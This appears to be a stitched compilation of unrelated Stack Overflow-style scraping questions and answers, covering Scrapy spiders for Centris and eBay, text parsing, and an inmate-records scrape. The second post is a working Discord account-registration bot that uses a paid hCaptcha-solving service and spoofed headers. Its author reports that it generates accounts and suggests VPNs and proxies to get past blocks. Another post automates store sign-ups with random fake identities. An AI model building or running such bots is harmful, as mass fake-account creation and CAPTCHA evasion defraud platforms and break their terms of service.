I am learning Scrapy and am trying to scrape this realtor site in Quebec. I am using their API to collect homes and print the URLs to the screen, but my last function, print_urls(), won't run. I am really stuck here: I tried debugging it, and execution just skips right over my whole function block.
class CentrishomesSpider(scrapy.Spider):
    """Spider that queries the Centris property API and yields listing URLs.

    Request chain: ``start_requests`` POSTs the search query to
    ``UpdateQuery``; ``get_inscriptions`` then POSTs to ``GetInscriptions``;
    ``handle_inscriptions`` parses the HTML fragment in that response and
    yields one item per listing.
    """

    name = 'centrisHomes'
    # allowed_domains = ['www.centris.ca']
    # start_urls = ['http://www.centris.ca/']

    # Headers shared by both JSON POST requests.
    _REQUEST_HEADERS = {
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36'
    }

    def start_requests(self):
        """POST the search query to the ``UpdateQuery`` endpoint."""
        # The query body was elided in the original post.
        query = {...
        }
        yield scrapy.Request(
            url='https://www.centris.ca/property/UpdateQuery',
            method='POST',
            body=json.dumps(query),
            headers=self._REQUEST_HEADERS,
            callback=self.get_inscriptions
        )
    ...

    def get_inscriptions(self, response):
        """Report whether the query update succeeded, then request listings."""
        _, success = self.success(response)
        if success:
            print(Fore.GREEN + 'Query Updated' + Style.RESET_ALL)
        else:
            print(Fore.RED + 'Query Not Updated' + Style.RESET_ALL)
        yield scrapy.Request(
            url='https://www.centris.ca/Property/GetInscriptions',
            method='POST',
            body=json.dumps({"startPosition": 0}),
            headers=self._REQUEST_HEADERS,
            callback=self.handle_inscriptions
        )

    def handle_inscriptions(self, response):
        """Parse the listings response and yield one item per listing."""
        homes, success = self.success(response)
        if not success:
            return
        print(Fore.GREEN + 'Count ' + str(homes['d']['Result']['count']) + Style.RESET_ALL)
        self.html = Selector(text=homes['d']['Result']['html'])
        # print_urls() is a generator: calling it only creates the generator
        # object. Its body runs only when it is iterated, so delegate to it
        # here so that its items are actually produced by this callback.
        yield from self.print_urls()
    ...

    def success(self, response):
        """Decode the JSON body and report whether the API call succeeded.

        Returns:
            A ``(payload, succeeded)`` tuple in every case, so callers can
            always unpack two values. ``payload`` is the decoded body and
            ``succeeded`` mirrors ``payload['d']['Succeeded']``.
        """
        # The body is JSON, so parse it as JSON: this handles true/false/null
        # anywhere in the document without string patching.
        payload = json.loads(response.body)
        return payload, bool(payload['d']['Succeeded'])

    def print_urls(self):
        """Yield a ``{'home_url': ...}`` item for each listing in ``self.html``.

        This is a generator; the caller must iterate it (for example with
        ``yield from``) for any of its body to execute.
        """
        print('try')
        page_html = self.html
        # XPath attribute tests use '@' (e.g. @class, @href).
        homes = page_html.xpath('//div[contains(@class, "property-thumbnail-item")]')
        for home in homes:
            yield {
                'home_url': home.xpath('.//a[@class="property-thumbnail-summary-link"]/@href').get()
            }
    ...
I figured out my own problem: I had turned my print_urls function into a generator, and calling self.print_urls() on its own only creates the generator object without running its body. Shout-out to @AbdealiJK; I figured it out because of his answer.
https://stackoverflow.com/a/34609397/19966841
Related
from twocaptcha import TwoCaptcha
import json
import requests
import random
def rand(list):
    """Return a random index that is valid for the given sequence.

    Raises ``ValueError`` (from ``random.randrange``) when the sequence is
    empty.
    """
    upper_bound = len(list)
    return random.randrange(0, upper_bound)
# NOTE(review): this script automates account registration using a third-party
# CAPTCHA-solving service. That very likely conflicts with the target
# service's terms of service -- confirm you are permitted to do this before
# running it.
# Pool of User-Agent strings; rand() picks an index into this list.
user_agents = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246',
'Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1'
]
# Headers passed to the registration POST in register(). The user agent is
# chosen once, when this dict is built.
# NOTE(review): 'authority', 'method', 'path' and 'scheme' look like HTTP/2
# pseudo-header names copied from browser dev tools -- presumably not
# meaningful as ordinary headers; confirm.
headers = {
'user-agent': user_agents[rand(user_agents)],
"accept": "*/*",
"authority": "discord.com",
"method": "POST",
"path": "/api/v9/auth/register",
"scheme": "https",
"origin": "discord.com",
"referer": "discord.com/register",
"x-debug-options": "bugReporterEnabled",
"accept-language": "en-US,en;q=0.9",
"connection": "keep-alive",
"content-Type": "application/json",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC45MDAzIiwib3NfdmVyc2lvbiI6IjEwLjAuMjIwMDAiLCJvc19hcmNoIjoieDY0Iiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiY2xpZW50X2J1aWxkX251bWJlciI6MTA0OTY3LCJjbGllbnRfZXZlbnRfc291cmNlIjpudWxsfQ==",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin"
}
# Client for the CAPTCHA-solving service; the API key is redacted.
solver = TwoCaptcha('redacted')
# The solve request runs at import time; on any exception the process exits
# with that exception as the exit message, otherwise the solved code is printed.
# NOTE(review): `sys` is used below but no `import sys` is visible in this chunk.
try:
result = solver.hcaptcha(
sitekey='4c672d35-0701-42b2-88c3-78380b0db560',
url='https://discord.com/register',
)
except Exception as e:
sys.exit(e)
else:
print(result['code'])
# Sends a GET to the experiments endpoint with a randomly chosen user agent
# and reads the "fingerprint" field from the JSON body.
# On HTTP 200 the fingerprint is printed; on any other status the raw
# response text is returned.
def getfingerprint():
request_url = "https://discord.com/api/v9/experiments?with_guild_experiments=true"
r = requests.get(request_url , headers = {
"user-agent": user_agents[rand(user_agents)],
"x-context-properties": "eyJsb2NhdGlvbiI6Ii9jaGFubmVscy9AbWUifQ==",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEwNS4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTA1LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjE0NTQyOSwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0="
})
if r.status_code == 200:
fingerprint = json.loads(r.text)["fingerprint"]
print(fingerprint)
else:
return r.text
# JSON body for the registration request, built once at import time.
# 'captcha_key' comes from the solver result and 'fingerprint' from a call to
# getfingerprint() made while this dict is being constructed.
# NOTE(review): the placeholder texts for 'password' and 'username' appear to
# be swapped relative to their keys.
payload = {
'captcha_key': result['code'],
'consent': True,
'date_of_birth': '2001-11-19',
'email': 'enter email',
'fingerprint': getfingerprint(),
'gift_code_sku_id': None,
'invite': None,
'password': 'enter username',
'username': 'enter password'
}
# POSTs the module-level `payload` as JSON to the registration endpoint with
# the module-level `headers`, then prints the response body prefixed by
# 'Token: '. Returns nothing.
def register():
data = payload
res = requests.post('https://discord.com/api/v9/auth/register', headers = headers, json = data)
print('Token: ' + res.text)
# Only call register() when the file is executed as a script.
if __name__ == '__main__':
register()
Code now works and generates accounts
just have to enter your own emails, username and password
can tell when it works cuz it outputs a token
if you get an error mentioning invalid hcaptcha response change email and use a vpn and try again
if you do decide to loop this have it loop slowly or setup proxies
I am a total noob using scrapy for the first time. I have set it up to get some information, but it always stops after 5 pages. I want it to scrape a lot more pages since at least 20 are available.
import scrapy
from myproject.items import EbaySold
class EbaySpider(scrapy.Spider):
    """Spider that walks eBay sold-listing pages and yields one item per product."""

    name = 'EbaySold'
    allowed_domains = ['www.ebay.com']
    start_urls = ['https://www.ebay.com/b/Apple-Unlocked-Smartphones/9355/bn_599372?LH_Sold=1&mag=1&rt=nc&_dmd=1&_pgn=1&_sop=13']

    def parse(self, response):
        """Yield an ``EbaySold`` item per listing, then follow the next page.

        Fields whose selector matches nothing are set to ``None`` instead of
        raising, and pagination stops cleanly when there is no next-page link.
        """
        for product in response.css('li.s-item'):
            # Create a fresh item for every product. Re-using one instance
            # means every yielded item is the same object, which later
            # iterations overwrite.
            product_item = EbaySold()

            name = product.css('h3.s-item__title::text').get()
            if name is None:
                # Fallback selector used when the title element is absent.
                name = product.css('span.BOLD::text').get()
            product_item['name'] = name

            product_item['sold_price'] = product.css('span.POSITIVE::text').get()

            # .get() returns None when nothing matches; guard before .replace().
            date_sold = product.css('div.s-item__title-tag::text').get()
            if date_sold is not None:
                date_sold = date_sold.replace('SOLD ', '')
            product_item['date_sold'] = date_sold

            yield product_item

        # .attrib is an empty mapping when the selector matches nothing, so
        # use .get() to obtain None rather than raising KeyError on the last page.
        next_page = response.css('a[type=next]').attrib.get('href')
        if next_page is not None:
            yield response.follow(next_page, callback=self.parse)
In your Scrapy project's settings.py file, make sure you have the following settings configured.
# Scrapy project settings suggested for this spider.
ROBOTSTXT_OBEY = False
COOKIES_ENABLED = True

# Headers attached to every request unless a request overrides them.
DEFAULT_REQUEST_HEADERS = {
    'accept': (
        'text/html,application/xhtml+xml,application/xml;q=0.9,'
        '*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
    ),
    'accept-language': 'en-US,en;q=0.9',
    'accept-encoding': 'gzip, deflate, br',
    'sec-fetch-site': 'same-origin',
    'upgrade-insecure-requests': 1,
    'user-agent': (
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
        '(KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36'
    ),
}

CONCURRENT_REQUESTS = 2  # small number
Then try running the spider again.
This is my code. I don't really know what the issue is: it gives me a 404 every time I run it, even though the URL does exist.
Any help appreciated
btw im pretty new to requests
The site doesn't have much protection as far as I know. It does use Cloudflare, but not so heavily that it checks the browser.
import requests
import randominfo
from requests.models import Response
import random
import string
import time
# NOTE(review): this script automates account creation on a third-party
# store; confirm that the site's terms of service permit it before running.
# Build a 15-character password by sampling, without repetition, from
# lowercase, uppercase, digit and punctuation characters.
lenght = 15
lower = string.ascii_lowercase
upper = string.ascii_uppercase
num = string.digits
sym = string.punctuation
# NOTE(review): `all` shadows the builtin of the same name.
all = lower + upper + num + sym
temp = random.sample(all,lenght)
password = "".join(temp)
# NOTE(review): `path` is not defined anywhere in the visible code.
# The whole file content is used as the e-mail suffix (`catchall`).
with open(path, 'r') as configFile:
catchall = configFile.read()
# NOTE(review): `login`, `passwordInput` and `passwordVeryfication` are not
# used again in the visible code.
login = randominfo.get_first_name() + '.' + randominfo.get_last_name() + catchall
passwordInput = password
passwordVeryfication = password
# Base URL fetched first with the session, and the URL the form is posted to.
URLGet = 'https://de.afew-store.com'
url = 'https://de.afew-store.com/account/register'
# Headers sent with the POST.
# NOTE(review): several keys here ('server', 'x-content-type-options',
# 'content-language') look like response headers rather than request
# headers -- presumably copied from browser dev tools; confirm.
RequestHeaders = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
'referer': 'https://de.afew-store.com/',
'content-language': 'de',
'method': 'POST',
'server': 'cloudflare',
'x-content-type-options': 'nosniff',
'path': 'account',
'scheme': 'https',
}
# Headers sent with the initial GET.
getHeaders = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
'location': 'https://de.afew-store.com/',
'server': 'cloudflare',
'x-content-type-options': 'nosniff',
'path': 'account',
'scheme': 'https',
}
# Random first/last name; the e-mail address is their concatenation plus `catchall`.
firstName = randominfo.get_first_name()
lastName = randominfo.get_last_name()
customerEmail = firstName + lastName + catchall
# One session is used for both requests so cookies from the GET carry over to the POST.
s = requests.session()
# The GET response is stored in `signup` but not inspected in the visible code.
signup = s.get(URLGet, headers=getHeaders)
# Form fields submitted as the POST body.
payload = {
'form_type': 'create_customer',
'utf8': '✓',
'customer[tags]': 'lang:en',
'customer[first_name]': firstName,
'customer[last_name]': lastName,
'customer[email]': customerEmail,
'customer[password]': password,
}
# Submit the form-encoded payload and print the HTTP status code of the response.
login_info = s.post(url, headers=RequestHeaders, data=payload)
print(login_info.status_code)
The host https://de.afew-store.com is unknown. Maybe you mistyped it
ping https://de.afew-store.com
ping: cannot resolve https://de.afew-store.com: Unknown host
I'm sending the request below to a URL and getting a response from it.
import requests
# Location of the data file on the local web server.
url = "http://localhost/dat.txt"

# Empty mapping handed to the request as its body data.
payload = {}

# Browser-like request headers.
headers = {
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': (
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
        '(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'
    ),
    'Sec-Fetch-Dest': 'document',
    'Accept': (
        'text/html,application/xhtml+xml,application/xml;q=0.9,'
        'image/webp,image/apng,*/*;q=0.8,'
        'application/signed-exchange;v=b3;q=0.9'
    ),
}

# Issue the GET and print the decoded body re-encoded as UTF-8 bytes.
response = requests.request(method="GET", url=url, headers=headers, data=payload)
print(response.text.encode('utf8'))
Below is the response data that I get -
mohame4|nameon@example.com|passsd!##$4|head,customer|manager,devlop
mohame3|nameon3@example.com|passsd!##$4|head,customer|manager,devlop
I do this with the data
# Iterate over the response line by line. Iterating over the string itself
# yields single characters, so every record would fail to parse.
for i in response.text.splitlines():
    # Each record has five pipe-separated fields:
    # username | email | password | roles 1 | roles 2
    i = i.strip().split('|')
    if len(i) < 5:
        # Skip blank or malformed lines explicitly rather than hiding every
        # possible error behind a bare ``except``.
        continue
    userna = i[0]
    emaill = i[1]
    passd = i[2]
    rol1 = i[3]
    rol2 = i[4]
How can I make rol1 as
this head,customer
to
rol1=['head','customer']
Simply split the string you're getting:
# Split the comma-separated fourth field into a list of role names.
rol1 = i[3].split(',')
You could do this more... gracefully, though, using iterable unpacking:
# Unpack the pipe-separated fields of one line in a single step; this raises
# ValueError if the line does not contain exactly five fields.
username, email, password, rol1, rol2 = i.strip().split('|')
# Turn the comma-separated roles string into a list.
rol1 = rol1.split(',')
Thanks to everyone who helped, especially @ForceBru.
import requests
# Fetch the data file and print the role list found in each record.
url = "http://localhost/dat.txt"
response = requests.request("GET", url)
print(response.text)
# splitlines() handles both \n and \r\n and does not produce a trailing empty
# entry when the file ends with a newline (response.text is already a str).
dat = response.text.splitlines()
for i in dat:
    i = i.strip().split('|')
    if len(i) < 4:
        # Blank or malformed line: there is no fourth field to print.
        continue
    print(i[3].split(","))
    # TODO: write code...
I'm trying to scrape this site https://acsd.crimegraphics.com, but I am getting only one record. Also, I don't know how to do this in a loop. I'm not able to scrape specific data. Here is the code that I have come up with so far.
import re
import requests
# Step 1: post back to the default page to open the inmates menu.
headers = {
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "en-GB,en-US;q=0.9,en;q=0.8",
    "Cache-Control": "max-age=0",
    "Connection": "keep-alive",
    "Content-Length": "31688",
    "Content-Type": "application/x-www-form-urlencoded",
    "Cookie": "ASP.NET_SessionId=4z2ypzsqxnug03cf5ztitpfx; ExistingVisitor=ExistingVisitor=Y; __utma=114720600.1520129764.1565270251.1565270251.1565270251.1; __utmc=114720600; __utmz=114720600.1565270251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=114720600.1.10.1565270251",
    "Host": "acsd.crimegraphics.com",
    "Origin": "https://acsd.crimegraphics.com",
    "Referer": "https://acsd.crimegraphics.com/2013/default.aspx",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36",
}
payload = {
    "__EVENTTARGET": "MainMenu$InmatesMenu",
    "__EVENTARGUMENT": "InmatesMenu",
}
url = "https://acsd.crimegraphics.com/2013/default.aspx"
r = requests.post(url, headers=headers, data=payload)
#print(r.text)

# Step 2: post the grid event for a single inmate record to the same URL.
headers1 = {
    "Accept": "*/*",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "en-GB,en-US;q=0.9,en;q=0.8",
    "Cache-Control": "no-cache",
    "Connection": "keep-alive",
    "Content-Length": "58838",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Cookie": "ASP.NET_SessionId=4z2ypzsqxnug03cf5ztitpfx; __utma=114720600.1520129764.1565270251.1565270251.1565270251.1; __utmc=114720600; __utmz=114720600.1565270251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=114720600.2.10.1565270251",
    "Host": "acsd.crimegraphics.com",
    "Origin": "https://acsd.crimegraphics.com",
    "Referer": "https://acsd.crimegraphics.com/2013/default.aspx",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36",
}
payload1 = {
    "ScriptManager1": "UpdatePanel1|gvInmates_ob_gvInmatesPE",
    "__EVENTTARGET": "gvInmates_ob_gvInmatesPE 77886",
    "__EVENTARGUMENT": "",
    "__LASTFOCUS": "",
    "__VIEWSTATE": "",
    "__VIEWSTATEGENERATOR": "38817EFB",
    "__VIEWSTATEENCRYPTED": "",
    "gvInmates$ob_gvInmatesSelectedRecordsContainer": "BOOKNO*_o_eg_*77882*_o_sep_*NAME*_o_eg_*GANNON%2C%20COURTNEY%20BETH*_o_sep_*BOOKDATE*_o_eg_*08%2F07%2F2019%2012%3A40*_o_sep_*ARSTAGENCY*_o_eg_*ACSO*_o_sep_*ARSTLOC*_o_eg_*SAN%20JOAQUIN%20CO*_o_sep_*STATUS*_o_eg_*In%20Custody*_o_osep_*true",
}
r2 = requests.post(url, headers=headers1, data=payload1)
print(r2.text)